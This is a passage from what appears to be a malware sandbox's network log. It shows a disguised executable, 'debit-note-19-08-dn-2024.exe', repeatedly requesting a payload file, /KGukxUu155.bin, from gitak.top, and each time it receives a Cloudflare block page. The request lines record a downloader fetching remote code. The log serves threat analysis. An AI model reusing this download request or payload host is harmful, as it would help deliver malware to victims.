2024-08-26 13:36:26 UTC	537	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:36:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5SLXdRMBnBxBeommIejQHI4fyzpj9YspjL0S5ELMxEX3SVoLluQp4pDvaVATNV%2FHMlapd1yhuXEL9c3RTey%2BdOyzW9zk56BBMizIAPXgwFdwY6PIAyguj1rTdKw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9435f55c9586f1-IAD
2024-08-26 13:36:26 UTC	832	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:36:26 UTC	1369	IN	Data Raw: 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a 20 20 Data Ascii: ss" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
2024-08-26 13:36:26 UTC	1369	IN	Data Raw: 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 78 37 41 30 75 65 32 41 62 67 4e 4e 61 6c 37 5a 39 73 50 4b 56 7a 4d 58 75 54 39 55 75 53 4a 50 55 4f 75 54 6c 4b 31 76 59 78 6b 2d 31 37 32 34 36 37 39 33 38 36 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 Data Ascii: nput type="hidden" name="atok" value="x7A0ue2AbgNNal7Z9sPKVzMXuT9UuSJPUOuTlK1vYxk-1724679386-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style
2024-08-26 13:36:26 UTC	848	IN	Data Raw: 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e Data Ascii: :hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a>
2024-08-26 13:36:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.11.20	49842	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:36:36 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:36:37 UTC	541	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:36:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QJShjbV8OU1tzSJOuBDSm%2F2cYP20SMaq%2F7k5xH3nivXGIj%2FUkLznU1tXluT9yBzFNwYCZzc2QpcL1JUo5Tl1JtWEMrByCb1pp61NrFtqvI4R%2BAYXyCBl5YSvMjg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b94363708ffc94f-IAD
2024-08-26 13:36:37 UTC	828	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:36:37 UTC	1369	IN	Data Raw: 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 Data Ascii: ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert')
2024-08-26 13:36:37 UTC	1369	IN	Data Raw: 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 6e 5f 73 38 6f 58 41 65 37 41 41 6d 6d 5f 71 39 58 36 43 35 68 56 71 68 55 47 44 5a 36 33 4d 71 62 45 4e 4f 6f 34 56 73 6e 6e 30 2d 31 37 32 34 36 37 39 33 39 36 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 Data Ascii: <input type="hidden" name="atok" value="n_s8oXAe7AAmm_q9X6C5hVqhUGDZ63MqbENOo4Vsnn0-1724679396-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" s
2024-08-26 13:36:37 UTC	852	IN	Data Raw: 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 Data Ascii: r sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare
2024-08-26 13:36:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.11.20	49843	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:36:47 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:36:47 UTC	539	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:36:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BdmAy1RnZWFIKVlLXAzmkd3miWr2yINqlkTOgd1TRVbrJBW84s0rHMB3ra%2FgU1q%2FO48JLXvlX9IBrbm0dhZsVMCrTQSw68fk353mrWQLbvs5w%2F671F3P8a68XGI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b943678a8d89c3d-IAD
2024-08-26 13:36:47 UTC	830	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:36:47 UTC	1369	IN	Data Raw: 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a Data Ascii: .css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
2024-08-26 13:36:47 UTC	1369	IN	Data Raw: 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 4b 65 73 4a 72 36 49 7a 44 67 35 72 39 4e 6e 64 51 79 7a 44 55 45 75 7a 79 42 45 4b 74 58 4b 43 54 48 6b 6c 50 37 61 68 5f 55 55 2d 31 37 32 34 36 37 39 34 30 37 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 Data Ascii: <input type="hidden" name="atok" value="KesJr6IzDg5r9NndQyzDUEuzyBEKtXKCTHklP7ah_UU-1724679407-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" sty
2024-08-26 13:36:47 UTC	850	IN	Data Raw: 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f Data Ascii: sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</
2024-08-26 13:36:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.11.20	49844	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:36:57 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:36:58 UTC	535	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:36:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wuW2MsJEv1kXM8Oar1Sy5SE4B8eHbq3mIKVTSJLbqAQZCPFCHiJa0qjfdkXpsxLGgCX65t6ePVm%2FeHDnHAQZEPa8OrrxFgFq8DDY7OfsqsIlqBZEG1Zqd2O9vVI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9436ba4a00821a-IAD
2024-08-26 13:36:58 UTC	834	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:36:58 UTC	1369	IN	Data Raw: 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a 20 20 20 20 Data Ascii: " /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
2024-08-26 13:36:58 UTC	1369	IN	Data Raw: 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 6f 55 75 64 4c 37 43 2e 4e 4d 49 75 6f 66 67 50 4b 70 46 56 75 4b 59 65 62 70 76 49 50 51 43 62 79 50 45 2e 62 62 32 74 39 41 41 2d 31 37 32 34 36 37 39 34 31 37 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 Data Ascii: ut type="hidden" name="atok" value="oUudL7C.NMIuofgPKpFVuKYebpvIPQCbyPE.bb2t9AA-1724679417-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="
2024-08-26 13:36:58 UTC	846	IN	Data Raw: 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e 3c 2f Data Ascii: idden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></
2024-08-26 13:36:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.11.20	49845	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:37:08 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
